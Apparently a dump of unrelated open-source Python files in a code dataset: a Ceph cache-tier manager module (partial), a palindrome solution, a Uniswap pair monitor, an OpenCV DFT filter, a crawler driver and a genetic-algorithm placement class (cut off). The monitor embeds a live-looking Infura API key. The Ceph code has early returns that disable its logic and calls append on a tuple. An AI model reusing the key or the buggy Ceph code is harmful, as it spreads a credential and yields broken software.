cache_pool\n }\n\n hit_set = {\n \"prefix\": \"osd pool set\",\n \"pool\": cache_pool,\n \"var\": \"hit_set_type\",\n \"val\": \"bloom\"\n }\n\n max_bytes_cmd = {\n \"prefix\": \"osd pool set\",\n \"pool\": cache_pool,\n \"var\": \"target_max_bytes\",\n \"val\": str(max_bytes)\n }\n\n run_cmds = (pool_cmd, pool_min_size, tier_add, cache_mode, set_overlay, hit_set, max_bytes_cmd)\n\n if max_objects > 0:\n max_objects_cmd = {\n \"prefix\": \"osd pool set\",\n \"pool\": cache_pool,\n \"var\": \"target_max_objects\",\n \"val\": str(max_objects)\n }\n\n run_cmds.append(max_objects_cmd)\n\n rcode = 0\n i = 0\n while rcode == 0 and i < len(run_cmds):\n self.log.info(\"Running command: {}\".format(run_cmds[i]))\n rcode, stdout, errstr = self.mon_command(run_cmds[i])\n i += 1\n\n if rcode != 0:\n self.log.error(\"Pool creation failed for cache pool {}: {}\".format(cache_pool, errstr))\n return False\n\n return True\n\n # run in background thread to flush cache\n def flush_cache(self,pool_name):\n self.log.info(\"flush_cache: pool {}\".format(pool_name))\n return \n\n rcode, stdout, errstr = self.mon_command({\n \"prefix\": \"osd tier cache-mode\",\n \"pool\": pool_name,\n \"mode\": \"forward\",\n \"yes_i_really_mean_it\": True\n })\n if rcode != 0:\n self.log.error(\"Error setting {} to cache-mode forward for flushing: {}\".format(pool_name, errstr))\n return False\n \n self.event.set()\n\n # wait for flush to finish\n rcode = subprocess.call(['rados', '-p', pool_name, 'cache-flush-evict-all'])\n if rcode != 0: \n self.log.error(\"Cache flush evict all failed for pool {}\".format(pool_name))\n return False\n\n return\n\n def remove_cache(self,cache_pool, backing_pool):\n self.log.info(\"remove_cache: backing pool {}, cache pool {}\".format(backing_pool, cache_pool))\n return \n\n # verify really empty\n try:\n pool_contents = subprocess.check_output(['rados', '-p', cache_pool, 'ls'])\n except CalledProcessError as cpe:\n self.log.error(\"remove_cache: pool {} error checking contents {}: {}\".format(cache_pool,cpe.returncode, cpe.output))\n return False\n if len(pool_contents) > 0:\n self.log.error(\"remove_cache: pool {} is not empty, not removing cache\".format(pool_name))\n return False\n\n rcode, stdout, errstr = self.mon_command({\n \"prefix\": \"osd tier rm-overlay\",\n \"pool\": backing_pool\n })\n\n if rcode != 0:\n self.log.error(\"Error removing cache overlay from pool {}: {}\".format(backing_pool, errstr))\n return False\n\n rcode, stdout, errstr = self.mon_command({\n \"prefix\": \"osd tier remove\",\n \"pool\": backing_pool,\n \"tierpool\": cache_pool\n })\n\n if rcode != 0:\n self.log.error(\"Error removing cache tier {} from pool {}: {}\".format(cache_pool, backing_pool, errstr))\n return False\n\n self.log.info(\"Removed cache tier {} from pool {}\".format(cache_pool, backing_pool))\n return True\n\n # fetch json dicts or lists from datastore or initialize for use if not yet stored\n def fetch(self,storekey, default = 'dict'):\n stored = self.get_store(storekey)\n if stored == None:\n if default == 'list':\n stored = list() \n elif default == 'dict':\n stored = dict()\n else:\n stored = json.loads(stored)\n\n return stored\n\n # store dict into datastore \n def store(self,storekey,data):\n self.set_store(storekey, json.dumps(data))\n\n#\n#\n#\n# cr_name = crush.get_rule_by_id(pool['crush_rule'])['rule_name']\n# root_id = int(crush.get_rule_root(cr_name))\n# pool_root[pool_id] = root_id\n\n # { poolid: {pool keys} }\n # self.log.error(\"HERE IS AN OSDMAP EXAMPLE: \\n\\n {}\".format(osdmap))\n \n #self.log.error(\"HERE IS A CRUSHMAP EXAMPLE: \\n\\n {}\".format(crushmap))\n\n # crush_exists = crushmap.get_item_name(cmd['crush_rule'])\n #self.log.info('Crush received: {}'.format(cmd['crush_rule']))\n # self.log.info('Crush looked up: {}'.format(crush_exists))\n \n # self.log.info('Crush name: {}'.format(crush_exists))\n #cmd['crush_rule']\n #cmd['pool_name']\n\n\n","repo_name":"MI-OSiRIS/ceph-mgr-cachetier","sub_path":"module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":32445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72887949254","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n list = []\n output = ''\n x = str(x)\n\n for i in range(len(x)):\n list.append(x[i])\n\n for j in range(len(x)):\n output = output + list.pop() \n\n if output == x:\n return True\n else:\n return False\n","repo_name":"aulee888/LeetCode","sub_path":"Palindrome Number.py","file_name":"Palindrome Number.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31921278864","text":"import json\nfrom web3 import Web3\nimport pymongo\nimport datetime\nfrom threading import Thread, Timer\nimport logging\nimport sys\nimport time\nfrom monitor.known_addresses import KNOWN_ADDRESSES\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(f\"logs/{__name__}_log.log\")\nformatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(funcName)s : %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\ndb_client = pymongo.MongoClient(os.getenv('MONGODB_INSTANCE'))\nscam_db = db_client[\"eth-scam-checker\"]\npairs_collection = scam_db[\"pairs\"]\n\nmy_provider = \"https://mainnet.infura.io/v3/002262bebeb24a3093c043587f48c428\"\nrouter_address = Web3.toChecksumAddress(\"0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D\")\nfactory_address = Web3.toChecksumAddress(\"0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f\")\n\nclient = Web3(Web3.HTTPProvider(my_provider))\n\nwith open(\"abi/IUniswapV2Factory.json\") as f:\n uniswap_factory = json.load(f)\n\nuniswap_factory_abi = uniswap_factory[\"abi\"]\ncontract = client.eth.contract(address=factory_address, abi=uniswap_factory_abi)\n\n\n# with open(\"abi/ERC20.json\") as f:\n# erc20_abi = json.load(f)\n\n\nclass UniswapMonitor(Thread):\n def __init__(self, thread_id, name, queue, wait_time):\n Thread.__init__(self)\n self.threadID = thread_id\n self.name = name\n self.wait_time = wait_time\n self.queue = queue\n\n def run(self):\n logger.info(\"Starting \" + self.name + \" with wait time: \" + str(self.wait_time))\n event_filter = contract.events.PairCreated.createFilter(fromBlock='latest')\n\n while True:\n try:\n for PairCreated in event_filter.get_new_entries():\n t = Timer(self.wait_time, self.handle_event, args=(PairCreated,))\n logger.info(\"Thread waiting to run handle event at: \" + str(datetime.datetime.utcnow()))\n t.start()\n # self.handle_event(PairCreated)\n\n except Exception as e:\n logger.critical(\"Infura PairCreated event failed, recreating eventfilter\", exc_info=True)\n try:\n event_filter = contract.events.PairCreated.createFilter(fromBlock='latest')\n\n except:\n logger.warning(\"Could not recreate eventfilter yet\")\n\n finally:\n time.sleep(30)\n\n def handle_event(self, event):\n try:\n json_object = json.loads(Web3.toJSON(event))\n token0_address = Web3.toChecksumAddress(json_object['args']['token0'])\n token1_address = Web3.toChecksumAddress(json_object['args']['token1'])\n\n pair = {\n \"pair_address\": Web3.toChecksumAddress(json_object['args']['pair']),\n \"token0\": token0_address,\n \"token1\": token1_address,\n \"blockNumber\": json_object['blockNumber'],\n \"create_time\": time.time()\n }\n pairs_collection.replace_one({\"pair_address\": Web3.toChecksumAddress(json_object['args']['pair'])}, pair,\n upsert=True)\n\n for token_address in [token0_address, token1_address]:\n if Web3.toChecksumAddress(token_address) not in KNOWN_ADDRESSES:\n self.queue.put(Web3.toChecksumAddress(token_address))\n\n except Exception as e:\n logger.error(\"Exception occurred\", exc_info=True)\n","repo_name":"smart-contract-check/smart-contract-check","sub_path":"monitor/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"70390747333","text":"import numpy as np\r\nimport cv2\r\nfrom pathlib import Path\r\n\r\ncaminhoImagem = Path('Anexos, Imagens e Videos/len_std.png')\r\n\r\n# Step 1 read in the picture\r\nimg = cv2.imread(str(caminhoImagem),0)\r\n\r\nimg_float = np.float32(img)\r\n\r\n# Step 3: Fourier transform with cv2.dft\r\ndft = cv2.dft(img_float, flags=cv2.DFT_COMPLEX_OUTPUT)\r\n\r\n# Step 4: use np.fft.fftshift to transfer the low frequency to the image center\r\ndft_center = np.fft.fftshift(dft)\r\n\r\n# Step 5: define mask: the generated mask is 1 in the middle and 0 around\r\ncrow, ccol = int(img.shape[0] / 2), int(img.shape[1] / 2) # Find the center of the image\r\nmask = np.zeros((img.shape[0], img.shape[1], 2), np.uint8)\r\nmask[crow-30:crow+30, ccol-30:ccol+30] = 1\r\n\r\n# Step 6: multiply the mask with the image after Fourier transform, and keep the middle part\r\nmask_img = dft_center * mask\r\n\r\n# Step 7: use np.fft.ifftshift() to move the low frequency to the original position\r\nimg_idf = np.fft.ifftshift(mask_img)\r\n\r\n# Step 8: inverse Fourier transform using cv2.idft\r\nimg_idf = cv2.idft(img_idf)\r\n\r\n# Step 9: use cv2.magnitude to convert into space domain\r\nimg_idf = cv2.magnitude(img_idf[:, :, 0], img_idf[:, :, 1])\r\n\r\n# Converte a matrix novamente para o tipo unsigned 8bits e ajusta a escala dos pixels\r\ncv2.normalize(img_idf, img_idf, 0, 1, cv2.NORM_MINMAX)\r\n\r\ncv2.imshow('Input Image',img)\r\ncv2.imshow('Ringed Image',img_idf)\r\n\r\ncv2.waitKey(0)","repo_name":"cegoes/TEC434_Pratica_OpenCV_Python","sub_path":"07.05 DFT Passa Baixa/DFT_Passa_Baixa.py","file_name":"DFT_Passa_Baixa.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"34745421093","text":"import subprocess\nimport os\n\ndef check_for_packages(package):\n cmd = (package+\" --version\" or package+\" -v\").split(\" \")\n sp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n rc = sp.wait()\n if(rc==1):\n print(\">> you have to install {}\".format(cmd[0]))\n os.system(\"pause\")\n else:\n print(\">> {} already exist in your machine\".format(cmd[0]))\n\ncheck_for_packages(\"node\")","repo_name":"Mohan20001/GetIP","sub_path":"download_pkg.py","file_name":"download_pkg.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15108076772","text":"__author__ = 'Lola'\n\nfrom crawler import Crawler\nfrom pageRank import pageRank\n\n#seeds\nurl_list = ['http://people.f4.htw-berlin.de/fileadmin/user_upload/Dozenten/WI-Dozenten/Classen/DAWeb/smdocs/d01.html']\nurl_list.append('http://people.f4.htw-berlin.de/fileadmin/user_upload/Dozenten/WI-Dozenten/Classen/DAWeb/smdocs/d06.html')\nurl_list.append('http://people.f4.htw-berlin.de/fileadmin/user_upload/Dozenten/WI-Dozenten/Classen/DAWeb/smdocs/d08.html')\n\ncrawl = Crawler(url_list)\n\ndef activate_crawl():\n\n if crawl.crawl_complete:\n print('website crawl complete')\n\n else:\n crawl.downloader()\n crawl.parser()\n crawl.frontier()\n\n #crawl feedback\n print('link temporary:\\t\\t', sorted(crawl.link_temporary))\n print('link set:\\t\\t\\t', sorted(crawl.link_set))\n print('page_rank_graph:\\t', crawl.page_rank_graph)\n print('not crawled:\\t\\t',crawl.url_seed)\n print('NEW RUN ++++++++++++++++++++++++++++++++++++++')\n\n activate_crawl()\n\nactivate_crawl()\n\npage_rank = pageRank(crawl.page_rank_graph)\nprint(page_rank.returnGraph())\nprint('number_of_sites:\\t\\t', page_rank.calc_number_of_sites())","repo_name":"CharlotteBolinski/CMS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12211153728","text":"\"\"\"\nOrganism object\nIt allocates the full data structure\n\"\"\"\n\nimport random\nimport numpy as np\nfrom scipy.stats import ks_2samp\nimport copy\n\ndef gini_RSV(values_for_each_class):\n '''\n Gini coefficient, modified in order to be able to deal with negative\n values as in \"Inequality measures and the issue of negative incomes\"\n (Raffinetti, Siletti, Vernizzi)\n\n Parameters\n ----------\n values_for_each_class : array-like object\n Values associated to each class.\n They don't need to be already sorted and/or normalized.\n They can also be negative.\n\n Returns\n -------\n giniRSV : float\n Ranges from 0 (perfect equality) to 1 (maximal inequality).\n\n '''\n \n N = len(values_for_each_class)\n \n numerator = 0\n for i in values_for_each_class:\n for j in values_for_each_class:\n numerator += abs(i - j)\n \n pos = 0 # sum over the positive values\n neg = 0 # sum over the negative values (in absolute value)\n for x in values_for_each_class:\n if x >= 0:\n pos += x\n else:\n neg += -x\n \n mu_RSV = (N - 1) * (pos + neg) / N**2 # modified mu parameter\n \n if mu_RSV == 0:\n # Manage two special cases (avoiding 0-division error):\n # - when a single value is the input\n # - when all the values in the input are 0\n # In both cases mu_RSV will be 0\n # No inequality is measurable, and therefore 0 is returned\n return 0\n denominator = 2 * N**2 * mu_RSV\n giniRSV = numerator / denominator\n \n return giniRSV\n\n\nclass OrganismObject:\n \"\"\"Organism object\n The Organism object essentially contains two vectors:\n - A vector of connector objects\n - A vector of recognizer objects\n The order of the elements in these vectors determine, implicitly,\n the connections between the elements (i.e. what recognizers a\n particular connector is connecting)\n \"\"\"\n\n def __init__(self, _id: int, conf: dict, max_pssm_length: int) -> None:\n \"\"\"Organism constructor\n\n Args:\n _id: Organism identifier (assigned by factory)\n conf: Organism-specific configuration values from JSON file\n self.pwm_length: Maximum column size of the pssm recognizer\n\t [will prevent mutations from going over max pssm length]\n \"\"\"\n self._id = _id\n \n # Instantiate recognizer and connector vectors\n self.recognizers = []\n self.connectors = []\n\t\n # assign organism-specific parameters\n\t\n # whether fitness is computed over sequences as sum or average\n self.cumulative_fit_method = conf[\"CUMULATIVE_FIT_METHOD\"]\n \n # energy thresholding parameters (to prevent negative energy values)\n self.energy_threshold_method = conf[\"ENERGY_THRESHOLD_METHOD\"]\n self.energy_threshold_value = conf[\"ENERGY_THRESHOLD_PARAM\"]\n \n # probability of replacing PSSM by random PSSM\n self.mutate_probability_substitute_pssm = conf[\n \"MUTATE_PROBABILITY_SUBSTITUTE_PSSM\"\n ]\n \n # type of indel operator: \n # - blind (preserves connectors)\n # - intelligent (merges connectors) \n self.insertion_method = conf[\n \"INSERTION_METHOD\"\n ]\n self.deletion_method = conf[\n \"DELETION_METHOD\"\n ]\n\t\n #probability of deleting/inserting a recognizer\n self.mutate_probability_delete_recognizer = conf[\n \"MUTATE_PROBABILITY_DELETE_RECOGNIZER\"\n ]\n self.mutate_probability_insert_recognizer = conf[\n \"MUTATE_PROBABILITY_INSERT_RECOGNIZER\"\n ]\n\t\n # probability of mutating a node\n self.mutate_probability_node_mutation = conf[\n \"MUTATE_PROBABILITY_NODE_MUTATION\"\n ]\n\t\n # min and maximum number of nodes allowed\n self.min_nodes = conf[\"MIN_NODES\"]\n self.max_nodes = conf[\"MAX_NODES\"]\n\t\n # maximum length of PSSMs allowed\n self.max_pssm_length = max_pssm_length\n \n # Map used by the placement algorithm\n # The list maps each row of the matrix of the placement scores onto a\n # column of a PSSM: each row is assigned a [pssm_idx, column_idx]\n self.row_to_pssm = []\n \n \n def set_row_to_pssm(self):\n \"\"\"row_to_pssm is an attribute that maps each row of the alignment\n matrix to the index (within org) of the pssm recognizer, and the\n column of the pssm that applies to that row.\n In the alignment matrix, the rows correspond all consecutively to \n pssm positions (i.e. columns).\n This attribute allows to go from row directly to a pair of indices\n denoting the pssm number and the position within the pssm that maps\n to it.\n \n Call by factory upon generation of organism, and also after any\n mutations that might change the size of the pssm, or the column order,\n or their number.\n \"\"\"\n \n pssm_list = self.recognizers\n \n # Initialize list\n # (first row in the placement matrix doesn't represent any PSSM position)\n row_to_pssm_list = [[None, None]]\n \n # Fill the list\n for i in range(len(pssm_list)):\n for j in range(pssm_list[i].length):\n row_to_pssm_list.append([i, j])\n \n # Token row\n # (this ensures that the last row will be considered the row of the last\n # position of a PSSM when calling self.is_last() on it)\n row_to_pssm_list.append([None, 0])\n \n self.row_to_pssm = row_to_pssm_list\n\n def get_id(self) -> int:\n \"\"\"Getter _id\n\n Returns:\n _id of the organism\n \"\"\"\n return self._id\n\n def set_id(self, _id: int) -> None:\n \"\"\"Setter _id\n\n Args:\n _id: ID to to set in the organism\n \"\"\"\n self._id = _id\n \n def mutate(self, org_factory) -> None:\n \"\"\"Mutates an organism based on JSON configured probabilities\n\n Args:\n org_factory (OrganismFactory): Factory of organisms and node\n components\n \"\"\"\n\n \n # Delete a recognizer (and one parent connector)\n if random.random() < self.mutate_probability_delete_recognizer:\n \n n_recognizers = self.count_recognizers()\n # if this is a single-node organism, skip deletion\n if n_recognizers != 1:\n \t\t\t# \"blind\" method: the remaining connector is left unchanged\n if self.deletion_method == \"blind\":\n # Choose randomly the recognizer to be deleted\n recognizer_idx = random.randint(0, n_recognizers - 1)\n if recognizer_idx == 0:\n # If the recognizer to delete is the first, the connector to\n # delete is the one to the right\n # ( same index: connector_idx = recognizer_idx = 0 )\n connector_idx = recognizer_idx\n elif recognizer_idx == n_recognizers - 1:\n # If the recognizer to delete is the last, the connector to\n # delete is the one to the left\n # ( different index: connector_idx = recognizer_idx - 1 )\n connector_idx = recognizer_idx - 1\n else:\n # if the recognizer to delete is in not a terminal recognizer\n # of the chain, the parent connector to be deleted (left/riht)\n # is chosen randomly\n if random.random() < 0.5:\n connector_idx = recognizer_idx\n else:\n connector_idx = recognizer_idx - 1\n \n \t\t\t\t# recreate vector of recognizers and connectors\n \t\t\t\t# skipping the recgonizer/connector selected for deletion\n new_recognizers = (self.recognizers[:recognizer_idx] +\n self.recognizers[recognizer_idx + 1:])\n new_connectors = (self.connectors[:connector_idx] +\n self.connectors[connector_idx + 1:])\n \n \t\t\t\t# assign new vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n \t\t\t# \"intelligent\" method: a new connector is created merging\n \t\t\t# the information of the right and left connectors for the\n \t\t\t# recognizer targeted for deletion\n if self.deletion_method == \"intelligent\":\n # Choose randomly the recognizer to be deleted\n recognizer_idx = random.randint(0, n_recognizers - 1)\n if recognizer_idx == 0:\n # If the recognizer to delete is the first, the connector to\n # delete is the one to the right\n # ( same index: connector_idx = recognizer_idx = 0 )\n connector_idx = recognizer_idx\n elif recognizer_idx == n_recognizers - 1:\n # If the recognizer to delete is the last, the connector to\n # delete is the one to the left\n # ( different index: connector_idx = recognizer_idx - 1 )\n connector_idx = recognizer_idx - 1\n else:\n # if the recognizer to delete is in not a terminal recognizer\n # of the chain, the parent connector to be deleted (left/right)\n # is chosen randomly\n if random.random() < 0.5:\n # Index of the parent connector that will be deleted\n connector_idx = recognizer_idx\n # Index of the parent connector that will be adjusted\n connector_to_stretch = recognizer_idx - 1\n else:\n # Index of the parent connector that will be deleted\n connector_idx = recognizer_idx - 1\n # Index of the parent connector that will be adjusted\n connector_to_stretch = recognizer_idx\n \n # Adjust parameters of the neighbour connector\n ''' The parent connector that is not deleted is modified,\n so that it can span the gap left by the deletion, without\n heavily affecting the placement of the nodes to the sides of\n the deletion point.'''\n \n # Adjust MU\n '''Thus, we need to add to the mu of the remaining connector\n also the mu of the deleted connector and the legth of the\n deleted recognizer.'''\n adj_mu = (self.connectors[connector_to_stretch]._mu +\n self.connectors[connector_idx]._mu +\n self.recognizers[recognizer_idx].length)\n \n # Adjust SIGMA\n ''' Variances are additive (under assumption of independence\n between the two random variables). Therefore to adjust the\n variance we need to add the variance of the deleted\n connector (the length of the deleted recognizer has no\n variance). Therefore, its standard deviation (sigma) becomes\n the square root of the sum of the squares of the sigmas.'''\n adj_sigma = (self.connectors[connector_to_stretch]._sigma ** 2 +\n self.connectors[connector_idx]._sigma ** 2)**(1/2)\n # set new mu and new sigma\n self.connectors[connector_to_stretch].set_mu(adj_mu)\n self.connectors[connector_to_stretch].set_sigma(adj_sigma)\n \n \t\t\t\t# recreate vector of recognizers and connectors\n \t\t\t\t# skipping the recgonizer/connector selected for deletion\t\t\t\t\t\n new_recognizers = (self.recognizers[:recognizer_idx] +\n self.recognizers[recognizer_idx + 1:])\n new_connectors = (self.connectors[:connector_idx] +\n self.connectors[connector_idx + 1:])\n \n \t\t\t\t# assign new vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n \n \n # Insert a recognizer (and one parent connector)\n if random.random() < self.mutate_probability_insert_recognizer:\n \n\t\t\t# instantiate the new recognizer and connector\n new_connector = org_factory.create_connector()\n new_recognizer = org_factory.create_pssm()\n \n\t\t\t# \"blind\" method: one of the existing connectors is used\n\t\t\t# (unchanged) to connect to the new recognizer\n if self.insertion_method == \"blind\":\n \n n_recognizers = self.count_recognizers()\n # Choose randomly the recognizer next to which the insertion\n # is going to occur\n recognizer_idx = random.randint(0, n_recognizers - 1)\n # Choose randomly whether the insertion is going to be to the\n # left or to the right of the considered recognizer\n \n if random.random() < 0.5: # Insertion occurs to the left\n # First connector after insertion point and first\n # recognizer after insertion point\n connector_idx = recognizer_idx\n \n else: # Insertion occurs to the right\n # First connector after insertion point\n connector_idx = recognizer_idx\n # First recognizer after insertion point\n recognizer_idx += 1\n \n\t\t\t\t# recreate vector of connectors/recognizers, adding\n\t\t\t\t# the newly minted recognizer+connector\n new_recognizers = (self.recognizers[:recognizer_idx] +\n [new_recognizer] +\n self.recognizers[recognizer_idx:])\n new_connectors = (self.connectors[:connector_idx] +\n [new_connector] +\n self.connectors[connector_idx:])\n \n\t\t\t\t# assign new connector/recognizer vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n \n\t\t\t# \"intelligent\" method: the existing and new connector are\n\t\t\t# \"averaged\" so that their mu and sigma are \"equivalent\" to\n\t\t\t# to the connector previously occupying the position where\n\t\t\t# the new recognizer has been inserted\n if self.insertion_method == \"intelligent\":\n \n n_recognizers = self.count_recognizers()\n # Choose randomly the recognizer next to which the insertion\n # is going to occur\n recognizer_idx = random.randint(0, n_recognizers - 1)\n\t\t\t\t\n\t\t\t\t# set no compression as default (for terminal insertion cases)\n connector_to_compress = None\n\n\t\t\t\t# Choose randomly whether the insertion is going to be to the\n # left or to the right of the considered recognizer\n if random.random() < 0.5: # Insertion occurs to the left\n # First connector after insertion point and first\n # recognizer after insertion point\n connector_idx = recognizer_idx\n\n\t\t\t\t\t# if the new recognizer is NOT be the first in the chain\n if recognizer_idx != 0:\n connector_to_compress = recognizer_idx - 1\n # (No compression is required if insertion occurs to\n # the left of the first recognizer of the chain)\n \n else: # Insertion occurs to the right\n # First connector after insertion point\n connector_idx = recognizer_idx\n \n\t\t\t\t\t# if the new recognizer is NOT be the last in the chain\n if recognizer_idx != n_recognizers - 1:\n connector_to_compress = recognizer_idx\n # (No compression is required if insertion occurs to\n # the right of the last recognizer of the chain)\n \n # First recognizer after insertion point\n recognizer_idx += 1\n \n\t\t\t\t# if connector needs to be \"compressed\" (not a terminal insertion)\n if connector_to_compress != None:\n \n '''Ideally, we would like the sum of the mus of the two\n connectors (the old one and the inserted one) + the length\n of the inserted recognizer to be equal to the gap spanned\n by the old recognizer, so that the insertion doesn't heavily\n affect the placement of the nodes to the sides of the\n insertion point. So we need to scale down the mus and sigmas\n accordingly.'''\n \n # Adjust MUs\n ''' If the legth of the inserted recognizer alone is larger\n than the gap (i.e. larger than the mu of the already present\n connector) we can't reach the goal entirely and the best\n thing we can do is to keep the mus of the two connectors\n maximally shrinked. Otherwise, the mus of the connectors\n will be scaled so that their sum is equal to the gap (mu of\n the old connector) minus the length of the inserted\n recognizer.'''\n \n mu_old_connector = self.connectors[connector_to_compress]._mu\n mu_new_connector = new_connector._mu \n current_sum_mus = mu_old_connector + mu_new_connector\n expected_sum_mus = mu_old_connector - new_recognizer.length\n # If the inserted recognizer alone is larger than the gap\n if expected_sum_mus < 0:\n # best thing we can do is to maximally shrink mus\n expected_sum_mus = 0\n \n if current_sum_mus == 0: # To avoid 0/0 case\n mu_scaling_factor = 1\n else:\n mu_scaling_factor = expected_sum_mus / current_sum_mus\n # Compress the neighbour connector\n self.connectors[connector_to_compress].set_mu(\n mu_old_connector * mu_scaling_factor\n )\n # Compress the new inserted connector\n new_connector.set_mu(\n mu_new_connector * mu_scaling_factor\n )\n \n # Adjust SIGMAs\n ''' Variances are additive (under assumption of independence\n between the two random variables). Therefore, the overall\n variance will be the sum of the variances of the two\n connectors. The variances will be scaled so that their sum\n is equal to the variance of the connector that was already\n present before the insertion. The standard deviations,\n which are the square root of the variances, will be adjusted\n accordingly.'''\n var_old_connector = self.connectors[connector_to_compress]._sigma ** 2\n var_new_connector = new_connector._sigma**2\n current_sum_variances = var_old_connector + var_new_connector\n expected_sum_variances = var_old_connector\n \n if current_sum_variances == 0: # To avoid 0/0 case\n var_scaling_factor = 1\n else:\n var_scaling_factor = expected_sum_variances / current_sum_variances\n # Compress the neighbour connector\n self.connectors[connector_to_compress].set_sigma(\n np.sqrt(var_old_connector * var_scaling_factor)\n )\n # Compress the new inserted connector\n new_connector.set_sigma(\n np.sqrt(var_new_connector * var_scaling_factor)\n )\n \n\t\t\t\t# recreate vector of connectors/recognizers, adding\n\t\t\t\t# the newly minted recognizer+connector and containing\n\t\t\t\t# also the \"compressed\" existing connector\n new_recognizers = (self.recognizers[:recognizer_idx] +\n [new_recognizer] +\n self.recognizers[recognizer_idx:])\n new_connectors = (self.connectors[:connector_idx] +\n [new_connector] +\n self.connectors[connector_idx:])\n \n\t\t\t\t# assign new connector/recognizer vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n # Mutate nodes\n # If MUTATE_PROBABILITY_NODE_MUTATION is set to real value, a single\n # node is selected. If set to null, all nodes are mutated\n if self.mutate_probability_node_mutation:\n # Mutate a random node\n if random.random() < self.mutate_probability_node_mutation:\n \n n_nodes = self.count_nodes()\n random_node_idx = random.randint(0, n_nodes - 1)\n if random_node_idx < self.count_recognizers():\n # mutate a recognizer\n self.recognizers[random_node_idx].mutate(org_factory)\n else:\n # mutate a connector\n connector_idx = random_node_idx - self.count_recognizers()\n self.connectors[connector_idx].mutate(org_factory)\n else:\n for recognizer in self.recognizers:\n recognizer.mutate(org_factory)\n for connector in self.connectors:\n connector.mutate(org_factory)\n \n # no matter what mutation is applied, order/columns/number of pssm's\n # may have changed, so we call the set_row_to_pssm to set their mapping\n # on the alignment matrix anew\n self.set_row_to_pssm()\n \n def get_placement(self, dna_sequence, traceback=False, \n print_out = False, out_file = None) -> dict:\n \"\"\"Places the organism elements (recognizers and connectors) on a sequence\n\t\t in an optimal way, maximizing the energy (i.e. cumulative scores) obtained.\n\t\t \n\t\t That is, it returns the best possible placement of the organism on the\n\t\t sequence, as a function of the cumulative organism energy.\n\t\t \n\t\t Inputs:\n\t\t - dna_sequence: DNA sequence to place on\n\t\t - print_out: bool to indicate whether to print or not the placement\n - out_file: file handle to write placement to, if desired\n\t\t\n\t\t The placement function implements a modified Needleman-Wünch algorithm.\n\t\t \n\t\t The algorithm uses a two-dimensional matrix, with the sequence on the X-axis\n\t\t and the PSSM columns on the Y-axis.\n\t\t - Substitution scores are computed as PSSM column scores.\n\t\t - First row is set to zeros\n\t\t - First column is set to -inf\n\t\t - Gaps are only allowed in terminal PSSM rows (last column of PSSM)\n\t\t - Gaps can only take place between end of PSSM (cell) and another cell in row\n\t\t - Gaps are scored according to the score from the connector between the two\n\t\t PSSMs, provided with the distance (and its internal mu and sigma)\n\t\t - Contiguous (diagonal) PSSM alignment invokes a zero gap using the appropriate\n\t\t connector\n\t\t - The alignment matrix is (M+1)x(N+1)\n\t\t - The traceback matrix (which stores info for traceback) is 2 x (M+1)x(N+1).\n\t\t - The extra dimension captures the two coordinates for the traceback to cell\n\t\t - Traceback through a gap enforces that a diagonal move must be taken next\n\t\t (this avoids double gaps in a row)\n\t\t - Traceback is initiated at the cell with the best value on the bottom row\n\t\t\"\"\"\n \n # Initialize the two matrices (alignment + traceback matrices)\n \n # Number of rows\n m = self.sum_pssm_lengths()\n # Number of columns\n n = len(dna_sequence)\n \n # Initialize matrix of scores (alignment matrix)\n\t\t# Matrix is (M+1)x(N+1), with the extra \"fake\" row/columns\n\t\t# Matrix is initialized to -inf, then first row set to zero\n scores_matrix = np.full((m+1, n+1), -1 * np.inf)\n scores_matrix[0,:] = 0\n \n # Initialize matrix of pointers (traceback matrix), to None\n\t\t# Matrix is 2x(M+1)x(N+1), to store row/col of incoming cell\n pointers_matrix = np.full((2, m+1, n+1), None)\n \n # Fill the matrices (top-to-bottom, then left-to-right)\n for i in range(1, m + 1):\n\t\t\t# Row fill up is done in two passes:\n\t\t\t# - First fill up with possible diagonal scores\n\t\t\t# & (for terminal recognizer rows only)\n\t\t\t# - Fill up with possible gap scores (horizontal moves)\n\t\t\t\n # Diagonal scores over row i\n for j in range(1, n + 1):\n # call PSSM column score function with the DNA sequence\n diag_score = self.get_diag_score(pointers_matrix, i, j, dna_sequence)\n\t\t\t\t# assign cumulative score to alignment matrix\n scores_matrix[i,j] = scores_matrix[i-1, j-1] + diag_score\n # Annotate \"where we came from\" in the pointers_matrix\n pointers_matrix[0][i,j] = i - 1 # row idx of the origin\n pointers_matrix[1][i,j] = j - 1 # column idx of the origin\n \n # Horizontal scores over row i\n # (only in rows at the interface with the next PSSM)\n if self.is_last(i) and i != m:\n \n # Scores and pointers from horizontal moves are temporarily stored in\n # the following arrays. They will be written altogether at the end of\n # the loop over j, to avoid reading them as starting scores for other\n # horizontal moves at a later cycles in the for loop over j\n\t\t\t\t\n\t\t\t\t# That is, the matrix with diagonal scores is left untouched, and used\n\t\t\t\t# as reference for any gap evaluations. The result of such gap evaluations\n\t\t\t\t# is placed on a temporary matrix. The best gap 